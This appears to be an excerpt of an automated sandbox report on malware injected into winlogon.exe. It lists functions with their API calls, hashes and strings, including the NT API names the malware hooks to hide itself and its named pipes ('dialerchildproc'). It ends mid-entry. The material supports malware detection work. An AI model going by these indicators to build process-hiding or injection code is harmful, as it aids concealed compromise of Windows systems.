                                                              • API ID: CurrentThread$AddressHandleModuleProc
                                                              • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                              • API String ID: 4175298099-1975688563
                                                              • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction ID: 52c27ab1b4cc8d1b0b7a026bbb00d0580f7e8789e5eca17ee175a033894297e0
                                                              • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction Fuzzy Hash: 9231B8AC518DAAB0EB46EFEDE9597D43361B70434BF90D093940B025B1AF38828AC350
                                                              Function 00000225DC6A1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$AddressHandleModuleProc
                                                              • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                              • API String ID: 4175298099-1975688563
                                                              • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction ID: bae3e35cc23bdf7e795311711b41c652c83ad71068a264824faefe60a6291ab9
                                                              • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction Fuzzy Hash: 583195AC240D6AB0EA46EFEDE8697D46361B70474BF94D023D80986675EF3CC249C350
                                                              Function 00000225DC616910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                              • API String ID: 190073905-1786718095
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: 7539ecd07ed9e19813cea4b70ed8e4e8e5b401edcb5cd18e99020899339b4ff2
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: DF81122D702E71A6FE60EBED944D35962E0EB95783F18C425AB4983797EF38C946C700
                                                              Function 00000225DC676910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                              • API String ID: 190073905-1786718095
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: 22cde9f525fffbeb1c6e8d8417a217ee6af8dab08b44ae11a5e6f92b2a2e472d
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: 5581E26D710E61A6FA54EBEE944D35923D0EB85B82F58C8259B0947FD7EF38C846CB00
                                                              Function 00000225DC64CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 00000225DC64CE37
                                                              • FlsGetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE4C
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE6D
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE9A
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CEAB
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CEBC
                                                              • SetLastError.KERNEL32 ref: 00000225DC64CED7
                                                              • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF0D
                                                              • FlsSetValue.KERNEL32(?,?,00000001,00000225DC64ECCC,?,?,?,?,00000225DC64BF9F,?,?,?,?,?,00000225DC647AB0), ref: 00000225DC64CF2C
                                                                • Part of subcall function 00000225DC64D6CC: HeapAlloc.KERNEL32 ref: 00000225DC64D721
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF54
                                                                • Part of subcall function 00000225DC64D744: HeapFree.KERNEL32 ref: 00000225DC64D75A
                                                                • Part of subcall function 00000225DC64D744: GetLastError.KERNEL32 ref: 00000225DC64D764
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF65
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF76
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast$Heap$AllocFree
                                                              • String ID:
                                                              • API String ID: 570795689-0
                                                              • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction ID: c96d39c070731bccc58dc25472949b9c8324ede58aceb138708ddbc32eb2cb43
                                                              • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction Fuzzy Hash: 3B41AB2C34CE64B6FE68A7FD955D36932825F857B2F24C7A4A937467E6DF388442C200
                                                              Function 00000225DC6ACE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 00000225DC6ACE37
                                                              • FlsGetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACE4C
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACE6D
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACE9A
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACEAB
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACEBC
                                                              • SetLastError.KERNEL32 ref: 00000225DC6ACED7
                                                              • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF0D
                                                              • FlsSetValue.KERNEL32(?,?,00000001,00000225DC6AECCC,?,?,?,?,00000225DC6ABF9F,?,?,?,?,?,00000225DC6A7AB0), ref: 00000225DC6ACF2C
                                                                • Part of subcall function 00000225DC6AD6CC: HeapAlloc.KERNEL32 ref: 00000225DC6AD721
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF54
                                                                • Part of subcall function 00000225DC6AD744: HeapFree.KERNEL32 ref: 00000225DC6AD75A
                                                                • Part of subcall function 00000225DC6AD744: GetLastError.KERNEL32 ref: 00000225DC6AD764
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF65
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6B0A6B,?,?,?,00000225DC6B045C,?,?,?,00000225DC6AC84F), ref: 00000225DC6ACF76
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast$Heap$AllocFree
                                                              • String ID:
                                                              • API String ID: 570795689-0
                                                              • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction ID: 16b8eac9f94798cf318e2989be29cf1ddfaa1c447e8d99b4c7a956a79ddaff1c
                                                              • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction Fuzzy Hash: 47415868300E6472FE68EBFD565D36922826F887B2F34C724A936C77E6DE39D441D201
                                                              Function 00000225DC642244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                              • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2171963597-1373409510
                                                              • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction ID: 1de5ddcc8f1dfc1167620b25f9dc58926eb66b08d3309719a253bb24b32ba1e0
                                                              • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction Fuzzy Hash: 8E215679628F5093F710CBA9F54835977A1F785796F608215DB5903BA4CF7CC145CB00
                                                              Function 00000225DC6A2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                              • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2171963597-1373409510
                                                              • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction ID: 123304303fb7c22e5d95d7b69af9060bb35e9dacbc8375ccdc98a975ab60097a
                                                              • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction Fuzzy Hash: 71217F7A614B6092FB14CBA9F54835973A1F789BA6F508215EB5943BA8CF7CC149CB00
                                                              Function 00000225DC64A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction ID: bf4187be2395a619f89a1bc8f3fca4df6631bddcfcdd61a4c67bb6d669326bcb
                                                              • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction Fuzzy Hash: 65E1A47A60CF60AAFB60DFA9D44839D77A4F745799F208155EE8A57B9ACB34C082C700
                                                              Function 00000225DC6AA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction ID: 555fb57b5e2f5e687e313f4fed1146f863cabed64c72fa6e629389c121d24878
                                                              • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction Fuzzy Hash: 23E1C77A604F50AAFB60DFADD44839D77A0F745799F309116EE8997B9ACB34C182CB00
                                                              Function 00000225DC619944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction ID: ccd8efdbd64409059a3f17658d38d7afc50ea8cd74631e28eb6d2bb9e49f1cd4
                                                              • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction Fuzzy Hash: F3E1D37A602F609AEF60DFA9D48839D77E0F749B8BF108115EE8947B99CB34C592C700
                                                              Function 00000225DC679944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction ID: 79a22f26d4f7f371d14ec50af5f62361132822db574cad1d617c9f743099e6d3
                                                              • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction Fuzzy Hash: 18E1C17A600F609AEB60DFA9D48839D77E0F749B9AF108915EE8957FD9CB34C492C700
                                                              Function 00000225DC64F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction ID: 4194e3e7209c85e71950454c05d0e0ffaf74f2fe4e207fa6d649fb1745087b51
                                                              • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction Fuzzy Hash: E541F42A32DE20B1EB56CBEEA9087553391BB49BE2F15C125AD0F87785EF38C445C315
                                                              Function 00000225DC6AF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction ID: 17cc71c834340602f80b56e8e75482b2e164db3fe2ea15b9f73ab924f287fe61
                                                              • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction Fuzzy Hash: 4A41C22A311F20A5FB16CBAEA9087553391FB45BA2F258129AE0EC7785EF38C445C316
                                                              Function 00000225DC64104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                              • String ID: d
                                                              • API String ID: 3743429067-2564639436
                                                              • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction ID: d1ef6154134f3d25a2e3b62082cc3c12da5f52964662e2438e80bc3b6bcb4469
                                                              • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction Fuzzy Hash: B6418077218F94D6E760CFA5E44879E77A1F388B99F148129DB8A07B58DF38C449CB00
                                                              Function 00000225DC6A104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                              • String ID: d
                                                              • API String ID: 3743429067-2564639436
                                                              • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction ID: 5a3c0a9bbafb0f78905138bbf46c57f4a34e7ddab14eac61c3c20f9c737e8ad5
                                                              • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction Fuzzy Hash: 9B418077214F94D6E764CFA5E44839E77A1F388B9AF148129DB8947B58DF38C849CB00
                                                              Function 00000225DC64D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D087
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0A6
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0CE
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0DF
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: 1%$Y%
                                                              • API String ID: 3702945584-1395475152
                                                              • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction ID: be52c68ba33939f5a848b29d9d21d48e408fdab80177f021fac5a07cf6ddf0ee
                                                              • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction Fuzzy Hash: C111B628B0CE64A1FE6897BED55D32971415B557F2F14C3A4A87B477DADE78C442C200
                                                              Function 00000225DC6AD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD087
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0A6
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0CE
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0DF
                                                              • FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: 1%$Y%
                                                              • API String ID: 3702945584-1395475152
                                                              • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction ID: 2022ee20624ae9fac7997fd3bf5dc1645fffc08433487f268156f8275001b495
                                                              • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction Fuzzy Hash: 6911C468700F6461FA68EBFE5A5D36961415F543F2F34D324A83AC77EADE78C842C201
                                                              Function 00000225DC647510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 190073905-0
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: a54115b046e8042141df28d7bb05dcfe8318faa30d7cb3b304a9c15ab40c91e6
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: 0281362C61CE31AAFB54ABEDA44C39937D1E785782F14C4A4DA0B877A6DB38C845CF00
                                                              Function 00000225DC6A7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 190073905-0
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: f6d16694de95954a0b883b7a0c824403c85fe028b68c945db90d9150eb585885
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: CF81D22D700E21B6FB54EBEDA84D39966D1AB8578BF34D425DA04C77A6DB38C845CF00
                                                              Function 00000225DC649DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction ID: 1846bb63d11909a53191b25e77548844483a8de6adc9bd3f24389271b0a95010
                                                              • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction Fuzzy Hash: 2131E62935EE60F1EE21DBCAA408B653398BB48BA6F5985259D1F0B798DF39C447C300
                                                              Function 00000225DC6A9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
